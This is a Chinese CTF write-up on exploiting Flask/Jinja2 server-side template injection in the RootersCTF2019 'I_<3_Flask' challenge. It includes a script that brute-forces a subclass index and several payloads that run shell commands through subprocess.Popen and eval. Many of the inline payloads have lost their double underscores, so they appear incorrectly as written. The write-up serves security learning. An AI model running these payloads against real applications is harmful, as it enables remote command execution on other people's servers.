[RootersCTF2019]I_<3_Flask

从源码中可以看到GET传参name是模板注入点。

{{config}} 查看配置信息,没什么有用的。

{{''.class.mro[1].subclasses()}} 得到所有子类

搜索有没有可利用的类,如file、subprocess.Popen,发现有第二个类,可以用来执行命令。

首先得知道该类的下标是多少,采用脚本爆破:

python 复制代码
import requests
from time import sleep
url = 'http://62725703-5aa8-4d87-9e93-33566fd87c41.node5.buuoj.cn:81/'

for i in range(1, 500):
    print(i)
    param = {
        "name": f"name={{{{''.__class__.__mro__[1].__subclasses__()[{i}]}}}}"
    }
    sleep(0.2)
    r = requests.get(url, params=param)
    if "subprocess.Popen" in r.text:
        print(f"结果是:{i}")
        exit(0)

结果是222

构造payload:

{{''.class.mro[1].subclasses()[222]('ls',shell=True,stdout=-1).communicate()[0].decode()}}

结果表明当前目录下存在flag.txt文件

{{''.class.mro[1].subclasses()[222]('cat%20flag.txt',shell=True,stdout=-1).communicate()[0].decode()}}

成功拿到flag。

假如没有子类可直接利用呢?

试试看用url_for.__globals__能不能行,发现可行。

payload:

url_for.globals['builtins']['eval']("import('os').popen('ls').read()")

也是可以的。

再进一步,假如这些函数也不能利用呢?

在查看子类的时候能看到有warnings.catch_warnings类,那就可以利用该类的init方法间接获得globals。

通过link这篇文章得到一个启发,可以不需要用脚本也能得到目标子类的下标:

将网页响应渲染出来的所有子类复制到Notepad++中

然后将所有逗号替换成换行符,记得勾选左下角的扩展。

这样就能根据代码行索引得到目标类的下标啦。在第182个

构造payload:

''.class.mro[1].subclasses()[182].init.globals['builtins']['eval']("import('os').popen('ls').read()")

也成功了。

总结一下:这道题是很基础的flask,没有任何过滤。相当于是 模板注入总结 的一道完美例题了。

相关推荐
Y5neKO12 小时前
某国赛CTF密码学题目Writeup:RSA
密码学·ctf·rsa
曲幽19 小时前
FastAPI实战:WebSocket vs Socket.IO,这回真给我整明白了!
python·websocket·nginx·socket·fastapi·web·async·socketio
爱学习的程序媛21 小时前
【Web前端】优化Core Web Vitals提升用户体验
前端·ui·web·ux·用户体验
爱学习的程序媛1 天前
【Web前端】前端用户体验优化全攻略
前端·ui·交互·web·ux·用户体验
yv_301 天前
云曦26开学考复现
ctf
爱学习的程序媛2 天前
【Web前端】WebAssembly实战项目
前端·web·wasm
我爱吃土豆12 天前
HTTP首部讲解
后端·http·web
小江的记录本2 天前
【Filter / Interceptor】过滤器(Filter)与拦截器(Interceptor)全方位对比解析(附底层原理 + 核心对比表)
java·前端·后端·spring·java-ee·前端框架·web
Y5neKO4 天前
某国赛CTF逆向题目Writeup:re1
python·逆向·ctf
JTaoX4 天前
Bugku-web(源代码)
web·writeup·bugku·url编码